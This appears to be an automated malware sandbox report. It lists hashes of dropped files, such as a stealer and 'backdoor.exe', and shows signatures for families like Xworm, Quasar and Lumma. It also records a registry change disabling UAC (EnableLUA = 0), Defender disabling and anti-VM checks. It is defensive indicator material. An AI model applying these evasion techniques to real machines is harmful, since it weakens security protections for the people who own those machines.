| SHA256 | 0541a0028619ab827f961a994667f9a8f1a48c8b315f071242a69d1bd6aeab8b |
| SHA512 | d19322a1aba0da1aa68e24315cdbb10d63a5e3021b364b14974407dc3d25cd23df4ff1875b12339fd4613e0f3da9e5a78f1a0e54ffd8360ed764af20c3ecbb49 |
C:\Users\Admin\AppData\Local\Temp\JPbyQX9w77.tmp
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\7PZJU9PUyC.tmp
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\lp4Fgk0pk3.tmp
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\jYHttuBG2u.tmp
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
C:\Users\Admin\AppData\Local\Temp\JrSWFFpOWQ.tmp
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Temp\4uuk5mlaGd.tmp
| MD5 | f310cf1ff562ae14449e0167a3e1fe46 |
| SHA1 | 85c58afa9049467031c6c2b17f5c12ca73bb2788 |
| SHA256 | e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855 |
| SHA512 | 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad |
C:\Users\Admin\AppData\Local\Temp\1IakgMLoou.tmp
| MD5 | 27de9d16403686379c32e00dfb6a0312 |
| SHA1 | 4592c91deec1cf66afc5b116f0bd4e3a0f8e52ae |
| SHA256 | 1e7ec645d56a3bb3876bf4badccdcee5419c6f7ca17eda62288a5b215fde0e7d |
| SHA512 | b5cd7007d86b75d5995feca3a7541cc7fb5e0f222c5ce0b3f6ef63b3a741f0a12c79a8830785ca31ab6cadd0c212a4872a8683645ec308e1721ff15dd96dfd6d |
C:\Users\Admin\AppData\Local\Temp\VUkDe7vVUE.tmp
| MD5 | 2dc3133caeb5792be5e5c6c2fa812e34 |
| SHA1 | 0ed75d85c6a2848396d5dd30e89987f0a8b5cedb |
| SHA256 | 4b3998fd2844bc1674b691c74d67e56062e62bf4738de9fe7fb26b8d3def9cd7 |
| SHA512 | 2ca157c2f01127115d0358607c167c2f073b83d185bdd44ac221b3792c531d784515a76344585ec1557de81430a7d2e69b286155986e46b1e720dfac96098612 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\GroupUninstall.jpeg
| MD5 | fc951e0db1a8b128bca4be7d856efe62 |
| SHA1 | 1305042384b041cc080627c0510dc128be241d92 |
| SHA256 | 7030641beed32eceaab12f7047c430e1896b057f554f03e948f9509f6e326eeb |
| SHA512 | 5acdc5ad85a946ba68b95d159ad1c53c760a01679e2661ef482e937133bb69355b998d7a22dab40e5a58930886958f2ca541ba14d8d185a019e1c81dbd57998d |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ImportHide.xlsx
| MD5 | 1f857375f2542f820afc84ed4a481c9d |
| SHA1 | e0cee491c102c5f19b23fa25022ea7dacbce1ee7 |
| SHA256 | 16d9c06612375d576d1032f3c3ec3a1f120926d10fcef2b5162412b8c39bb327 |
| SHA512 | 8b22cb32d30144f6d2f718b56c3ae734737382ed28a699555e9c489665bc94c7b38b9f0b20c8f31ae0a1343b5f4b1cc716ebbd863a39425aa140ade6d1e6d7e4 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\UnregisterPing.mp3
| MD5 | c72ddc50e081fadde6cb788a7949e4a2 |
| SHA1 | b6c94bbacbb17222502e8038a54341f52e43b24e |
| SHA256 | e56ae5f7bdb5a8b464ccb55de715e51dfbd496b23f51d68bfbb8feb64d3af876 |
| SHA512 | 523e99300f170f9aad96374acebf6970084e95fbf6ef2bd9a8d156c26c18b74c15cda5da45addcd9ce1296e258d040c90fed0c8ab53211261c600c48972f41e0 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\ResumeAdd.png
| MD5 | fbeb878051745dc7e376913b555fd5a2 |
| SHA1 | d9a4f1ce944ee40306212196aaf1f8fabd7e22ea |
| SHA256 | 4f2da59737dff0f0a8a5a047c04eb108633479e48aceb46a6bc07b3e408b1cef |
| SHA512 | 9daea76db1d454d6f82e7db248d403a5d693685fd6e653f6c61765c113cdf610bf440f483174367fcef8f4a4b27e31185b069e1f4385a23bc1a0640b9d2dde62 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\InitializeConvertTo.jpg
| MD5 | 70bde1d9e42114d531fff727174457c7 |
| SHA1 | 15d4f13005e955eaeb248632b472118d32a3c228 |
| SHA256 | 15587b2aa846a9e6a44c5b58c0ef9fbcc5b8c7f17f385914e05949777057b184 |
| SHA512 | 0fcf0025625dfabaed90677392c0660f16f1e2c365b919264acf11603ae824d073f6c02c05f073922f8e064b644dc3c264a21ce76c1ae254f82c49ed33497435 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\WatchBackup.mid
| MD5 | a8b42607b523257f9857ce40ab3ae8ad |
| SHA1 | 37c6c34b16c086a3fa3250e89eed06221d970e0b |
| SHA256 | 1ce123d5f5b30961bd41cc6d13d3fe6bb62e2be6ac7e521b374aa8af3a1e38cc |
| SHA512 | 3f52b61391854bfc6b393692e733461966d47c43b5831db82a63b83eeea6e444d1ece63555eefaf706fd95f9b4727109487b91e8a581196bc8bfd835b6a06e42 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\RenameNew.png
| MD5 | 2374a261f5c0f8286ad2791762c18244 |
| SHA1 | 054c2c0b77d6556e671469fd48586241ead33d7e |
| SHA256 | 6a115914f783eeb847ad31934b028e701d4d427a3413bc06c37aac546cc03958 |
| SHA512 | 4e8939a5fea857aabf83da1d6c71af1583381cfa3490ab13fb02c98fdc035d4a21cf68ff8d1f6a807acb03ad9196e77b6fa903b4d5e9c28b1065449f319f898a |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\OutSuspend.doc
| MD5 | 813a6adc570a618933d340f36aabc32d |
| SHA1 | 27f2385e0acfadd9ce3ad2b927241854b645a6e5 |
| SHA256 | e210abd6ae813a85b7af8cbf614cc329afa58a3d2bf56b6a578362d855a6bfbd |
| SHA512 | 91e05b87d195538e715c5347365bdb700a4381b016fef5661da259b90749ac4026e086575b0b6216a2afd1acfa4b8e7fe3edbe588d770622cd5838a22f3557de |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\BackupComplete.pub
| MD5 | f80663cbabdb6e47f177668c98693dbb |
| SHA1 | 222afba694b36e001e91deef3fd8929930fd845a |
| SHA256 | 404d35bfb57ff4974c4a53c1086e7981d853216ac7e4c2008fd9e5149b4027d9 |
| SHA512 | be1719a0fe891240ac85b69927df1c5568562704fd291220a95525eeb7bef218a713a358a13e0cac00afd0517ba91476d386fab668a17f76bf93327368c9f918 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ResumeUnlock.txt
| MD5 | dfdfbe51bd18537ed658533df60d9d42 |
| SHA1 | af4690088d62607565743e4683c8acf5fa882724 |
| SHA256 | 39c2fff2a2cff2f78c11d2a392b0cfee2215c80b30eb90737db263939c680997 |
| SHA512 | 5d877e6d5d7c3ce355ea78d04424899be2b3d1700e9bb9f252ac3d4c851bde77564d85b7a7f6656e361ddcfe8820f8d909616b1887277ae8c4bd2c91e5bebabd |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ResumeEnable.csv
| MD5 | cbd89f9dde150f48bba80a409c5dc253 |
| SHA1 | d9daee4c519245104e9e04be2707309b5d7c7c63 |
| SHA256 | 0f72c6fc5659af2e03f777caf92cd8135458760e4743db26ee827bcc3c312a68 |
| SHA512 | 804fc50eb775642f9e0c15f897e0c3ff4c934dfc19a57a399968fdcd9a92e58c16882cd47e97a16d76244c5afea703e18f53b23ca631eab07b6d8b845ada8b06 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\GroupSave.xlsx
| MD5 | 500c379097c07ca851bdd4e1a8401773 |
| SHA1 | e264cb14f234c36fdce93ca3ecdc4927ff380c83 |
| SHA256 | bc95770b1bad74a38873c4f00629d45a6baf2f891a0e37c22812aa61d25d5dee |
| SHA512 | 100fe236d092003167a8f6aed55544f2d418fd0829bf93124024da9d0ee761751167ed2d43c184a7012204565b3882b34b52172fe05a462fc192a2f76169d569 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\GetStart.xlsx
| MD5 | 27b01c3e06c78bcae918a845636393bc |
| SHA1 | 63e09d262c4a2ae3a2e42d6a8c47445badc7c2bd |
| SHA256 | 98f493d97de02e7383b1db0be163c76378a851df9cf633561a82b499f3655793 |
| SHA512 | 09516ff476373955bcc447cbd7ca84f6b40b8ed29fcb5135207fdea15d8b3759dfbd86315c79c84d8de1af527942278ae2e8e23edb78b5dd9820cb49e7f54e80 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\BlockPush.xlsx
| MD5 | 3da8732f875b4602dcb3111228840db2 |
| SHA1 | 84a8915865cb628273ae8624a19f6b3a7f6dd958 |
| SHA256 | 670ef42499ca0f6d07de1e45bdee896a69c0c25a634d16b0b7c255807230e630 |
| SHA512 | 5a59d8fed59d6ffb355b2b22b6046989c867605b754ef3e31fff2d7bf835064e89cae793e687d86541ca2a55da0eafa81ccfcdcd23f1e332c87740bbadf7b660 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\UninstallSelect.jpeg
| MD5 | 638b13467581280a5326afe2679462d0 |
| SHA1 | 24814775e987c062df79946bc1dd5e71fe0363b8 |
| SHA256 | 95b4dab7c8a8f0b16c613d2606b1f4e6c570bf1fba35d0fb357c0ce0d6be2236 |
| SHA512 | 74c47fc9d7f0426c06f57c0c50427bcb51fa32a5dba9df517f0451f1137be6576c4bcdec66043f75deda405296b5bfe5854095b2cd478c487972f667b5a55e38 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\TraceComplete.jpeg
| MD5 | 2b205b8abf2fce18c2afdf45c76a729b |
| SHA1 | 7448f6f50d3c325c4f35bdd6b50d18aad5e929dc |
| SHA256 | aeb5c65f079c8032c808b91cd771c6254fd43d1ee783f648ee3a4d12f42a1e23 |
| SHA512 | def2f088b1127b27dc07b1010f1acb309ead8c808507b592cf621e266209436f2a398599025221f7752238939680c8f95794190460d2a52e9a23d8a84a695eb7 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\SyncNew.png
| MD5 | 76f39d3e2919ced0ec24ab62443be762 |
| SHA1 | 95864e3b9f711c47b13d87099ddf02940ccc88ca |
| SHA256 | c7a7ffb315ed5010ace3ef698a4f4cfed5acc1d3e3cd94687ac2b044a5f08369 |
| SHA512 | 03fa0ca654555698ed3d835eebf6bb5cb3035ce9f02bdf116e947781e09d0a90b8ecd42877538cdd07310f17bbe5fda64dd7e7902c55d7bdb2f2fd044e967d52 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\StartBackup.tiff
| MD5 | f63fdcb9b8ff4ddf14f86f5b1cf2e6a5 |
| SHA1 | 04366133d835d59ddd466b7156bae4f715e9ee57 |
| SHA256 | 38f20e412465487c74f32646c0395aca871950c502cdce5b79d9797a3badde38 |
| SHA512 | 293f93bcac85deb6062e43c1f224e410e0402a524e906f0f0666d2508d72752fe73874c1a81b0936bd63fb751d535654ee4fa4d02a18558e3c65dc797c7dbd22 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\My Wallpaper.jpg
| MD5 | a51464e41d75b2aa2b00ca31ea2ce7eb |
| SHA1 | 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d |
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
| SHA512 | b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\UpdateAdd.xlsx
| MD5 | aa47cf8b9c487b39c04fd2c45be86eee |
| SHA1 | 71a5544ab553cf1e3cfce4ed9aa8427ac568c7d6 |
| SHA256 | 4a70819c9a83da30c33ec924475f2f2d1f8ef3998c7d171c4117c4eca82612a7 |
| SHA512 | 089f430cef3a80e3c0a0221ec0fd436a9b60238cac01874546b399bec158454b8a34c27740bb9b4c6c4c376b3a1535780820b1d89f1a0c0cd157b48f27807e93 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\UnblockBackup.html
| MD5 | d126d53aaaf6da414b79e0fa67aa9dd5 |
| SHA1 | 7ddde7d7d6f81d2427923ee96ab6f237f3050e0a |
| SHA256 | 8eda072732a2d7ccdf33b776b9638857547db6814e0135b6786716e2269a279f |
| SHA512 | d1f383cd5e214e734b69630568cf6b5cef798d845c584ca7995354b7a61a6b6aa8729094231cc2d45654ad6edce1d3251deb35edff99efff7c18e38de6986ed1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\JoinBackup.tiff
| MD5 | b816558d107485e8254e6637d7e1fcb2 |
| SHA1 | 750b2e13ee3182655eb80cd6059bbe69d3537a6c |
| SHA256 | 15c521ae8b607b89bbce7b5395b688e821a035cdc68d550981a95dcf7759893f |
| SHA512 | c5176e7a913c4987dff81f7e5d9f486c605f097a71fe5e30d5d14e26de5c11045a60e912ab2ea2c933c37582e8f25d26aed4d533923d40845e6913f5becb1606 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ExitUnprotect.docx
| MD5 | 29685a43fbe3a9c480b8c4d78fbc66b3 |
| SHA1 | 51c904d322a9f1f8b865e9289af5bd50f1dbdce3 |
| SHA256 | 2a18a434c3cbe8cc6b4d2a2718f9923ecdb5a355bd97d16018d1b120a69a2185 |
| SHA512 | 23b4c2b4ca2dc6b0c8732bab24aaac46be04038e3d2d5b9eb8bef28fd4cf8921cf073a1e4a89c8d070018699a084c6927a4ce2400e186f459d59e38d8f0de4e2 |
C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe
| MD5 | d4e3a11d9468375f793c4c5c2504a374 |
| SHA1 | 6dc95fc874fcadac1fc135fd521eddbdcb63b1c6 |
| SHA256 | 0dc03de0ec34caca989f22de1ad61e7bd6bc1eabc6f993dbed2983f4cc33923d |
| SHA512 | 9d87f182f02daafad9b21f8a0f5a0eeedb277f60aa2d21bb8eb660945c153503db35821562f12b82a4e84cef848f1b1391c116ff30606cb495cf2e8ce4634217 |
C:\Users\Admin\AppData\Local\Temp\Files\jtkhikadjthsad.exe
| MD5 | f453c5f8c736ff8c381e7022cad85e3e |
| SHA1 | 1906c904a33b1910b88f2020a7942776ab7ad54e |
| SHA256 | 36a780c3cfcc5162d80bf88a5ba5f1bac2149c1d6d3a04ff5536decb31d494ac |
| SHA512 | b9a64daa7591029d966d8ac6684c1eb049f6a3f89865fb760e0ebfe57dc300d3f6f50dace3353e461370655a8d8bf518ac7b176c574f73ecd43713ad9851282f |
C:\Users\Admin\AppData\Local\Temp\Files\onetap.exe
| MD5 | fadf16a672e4f4af21b0e364a56897c3 |
| SHA1 | 53e8b0863492525e17b5ce4ff99fb73a20544b87 |
| SHA256 | 21314041b5b17d156a68d246935ab476d3532a1c9c72a39b02d98a6b7ef59473 |
| SHA512 | d9b756b98fcb1451431223b40e46c03f580dc713f445d3a4ff694784df3d8fff3d40985dd792d1bae717d5eca00c1471b1b628837267ee583386f5abcddac3f5 |
C:\Users\Admin\AppData\Local\Temp\Files\LummaC22222.exe
| MD5 | 40e9f5e6b35423ed5af9a791fc6b8740 |
| SHA1 | 75d24d3d05a855bb347f4e3a94eae4c38981aca9 |
| SHA256 | 7fdd7da7975da141ab5a48b856d24fba2ff35f52ad071119f6a83548494ba816 |
| SHA512 | c2150dfb166653a2627aba466a6d98c0f426232542afc6a3c6fb5ebb04b114901233f51d57ea59dbef988d038d4103a637d9a51015104213b0be0fe09c96aea8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96ff1ee586a153b4e7ce8661cabc0442 |
| SHA1 | 140d4ff1840cb40601489f3826954386af612136 |
| SHA256 | 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8 |
| SHA512 | 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | f99e42cdd8b2f9f1a3c062fe9cf6e131 |
| SHA1 | e32bdcab8da0e3cdafb6e3876763cee002ab7307 |
| SHA256 | a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0 |
| SHA512 | c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6 |
C:\Users\Admin\AppData\Local\Temp\plwuyqaj\plwuyqaj.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
C:\Users\Admin\AppData\Local\Temp\ \Display (1).png
| MD5 | 1d61085cf3bca01ec9df447e161abdc9 |
| SHA1 | 02cf65b93f89fc6f924ef8c68f16c21de37d75a1 |
| SHA256 | 6a71b25ba2ba966e6848e71baa4a3c01c23c2c4dd9a5950bc7d815f0674530b0 |
| SHA512 | 27f271850d1deaa383b964c570e637d38bd5b2db8fa331e01d6985ee084eefc5c2c5b13827eaf724612a17c67c293609450ddcebd9cc8a2584d21395d0879ee4 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Downloads.txt
| MD5 | 55721729ff900b02afbf726a608f3751 |
| SHA1 | db4a015fbae3547376ae328b6bd7d4e288e42c0e |
| SHA256 | e824f20dd292092ad6478c539b2401a937c983261f3e5d4c430440c8e27bcfc9 |
| SHA512 | 3a69d02d4fcdd922ebd10a5c5e8ab330d6002ab157b286adc56cbcbd34689e6ebe8736f1a5ee07e91fcf1e52ad416b3a67d5b4c75275b2f877b2e0926f67d5e8 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Videos.txt
| MD5 | e140e10b2b43ba6f978bee0aa90afaf7 |
| SHA1 | bbbeb7097ffa9c2daa3206b3f212d3614749c620 |
| SHA256 | c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618 |
| SHA512 | df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Music.txt
| MD5 | ac047cc56a8df73ff7d800837df55c90 |
| SHA1 | 607a418bedcb9e8c084d786f614386cab0a35489 |
| SHA256 | facaa76d6ea691ed15102dad7b62bf9aab18fe9c2cde1dde41bfd7fb5affb517 |
| SHA512 | 00af4889a79f09587c2a5f7003d48bfe9784b7ae83dd333ceb69333fe5a726763414dacd613e3a060afcb17f76b5b41e9fef5b3a509df4121fa0a15727c53b55 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Documents.txt
| MD5 | b2641cc8ebc8b6d0fd0973a6c17128d8 |
| SHA1 | fe2fba1b2f2615403e58890975f52b47f6ed8689 |
| SHA256 | ef083d83a1575f0a4edb1ede88e5aceb8a713d28b2b8f6d36d7df51305ce3f38 |
| SHA512 | 97ab5fef3edbc237a37e42f2d9252bf2320bb10ac297c1c36247799574e2e8ce69e023bee122fdcfabd1e4e47af65dff2ff8c1a17d9193208e0a2c9260a44a29 |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Pictures.txt
| MD5 | 1d799943a692982e1c2d14c5900c900b |
| SHA1 | 99ef3c69843746dfcc76be1a8cb485cbb38e177c |
| SHA256 | 31dbf003773620abaf19f5b9c71c75c438a17d779c817e7ad667733e198b410c |
| SHA512 | 152bc1adc49d5f93df30cd2b54af7f39b612641c6302525f8ebf8cdeeb9edb8367bdc55bf536e1928912c32965e125329922a9fe97ced971087d367c6c4c762a |
C:\Users\Admin\AppData\Local\Temp\ \Directories\Desktop.txt
| MD5 | d7770da1bd8f0e712c6f17be019c3319 |
| SHA1 | e51aebee53504d21465bab0fdac8e98d14323f39 |
| SHA256 | f7a6176548de8150070e1476c827fa2fb7180b369537869a609f8b6fdbdd1c38 |
| SHA512 | 0d10f9facb55a5548eb079ff7007f6d407304d9f3cd8b9a22ede6ad8e743a10a68b6a556519578dd081cd84cb042455d393584864cb0f991bfae80b78bf68197 |
C:\Users\Admin\AppData\Local\Temp\ \Credentials\Chrome\Chrome Cookies.txt
| MD5 | c01e234f03633adff5e4e3eb57edca3a |
| SHA1 | 837e7ed7a95ed19968d951f80a29ea8aad1fec06 |
| SHA256 | e6bb381dcd3177b226d8e3ad4b3a83ffd403fe42071b264e02d8dddf6fe47aee |
| SHA512 | 2d7afabf40868c2d79859a4b30498ea4bbb082dd7b9b7a069867ea8d403effef478df16cd66013749ffaa1ae56055994d05f734e698ac32dcf974bae0a3f31e3 |
C:\Users\Admin\AppData\Local\Temp\ \System\System Info.txt
| MD5 | 56fba21a64384b6db8890bda7cbff6df |
| SHA1 | 86211fc22ceb4cac3927d8c1184e94fd9a4fa46f |
| SHA256 | 0ea7b3062ea4a81e3184a363c675f4fa76216be7aee0eea1e6791eda34fd3cf4 |
| SHA512 | 982af3174f8af254cf04d93ac3675bdedea16f94086ccbe1e9c5c6492e4c453c73161600fcd0a094d27ed1d4b0b574ceb16bf24817cbe1ebd09c7d7104fdbf2d |
C:\Users\Admin\AppData\Local\Temp\ \System\MAC Addresses.txt
| MD5 | 550c4b343012634d54b4b2d89c17228f |
| SHA1 | 2251dc28ba73f3405657b0944ff7338baa2d4dee |
| SHA256 | a97cf91d2d5b9ae5c0c9cf45eea996cce7aff56d8649241adb901bc6d015e283 |
| SHA512 | a9dbe9484049aa89c14d64aaf6cb25750c185dda4455ea4053ceb6db74d34ce3614edfa7d39561968db8ddd0204dac33320573ecfc5c77ca36f7f44e7bcca81b |
C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe
| MD5 | 698f5896ec35c84909344dc08b7cae67 |
| SHA1 | 4c3eb447125f74f2eef63e14a5d97a823fa8d4e9 |
| SHA256 | 9cc2e2d5feeb360b2ea9a650809468f08e13c0e997ebadf5baa69ae3c27a958e |
| SHA512 | 2230abef3f2ac7fff21f2af8a1df79a0ab3f7b1153ce696745ff5cef7f677bfe562dc820eb36be8e4819210ffa565d52e3b940f0cad5427d30a3aa05a4bcde2b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-12-12 18:16
Reported
2024-12-12 18:19
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
144s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Processes
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exse.zip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-12-12 18:16
Reported
2024-12-12 18:19
Platform
win10v2004-20241007-en
Max time kernel
108s
Max time network
151s
Command Line
Signatures
44Caliber
44Caliber family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2216 created 3520 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | C:\Windows\Explorer.EXE |
| PID 1896 created 3520 | N/A | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | C:\Windows\Explorer.EXE |
| PID 2792 created 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
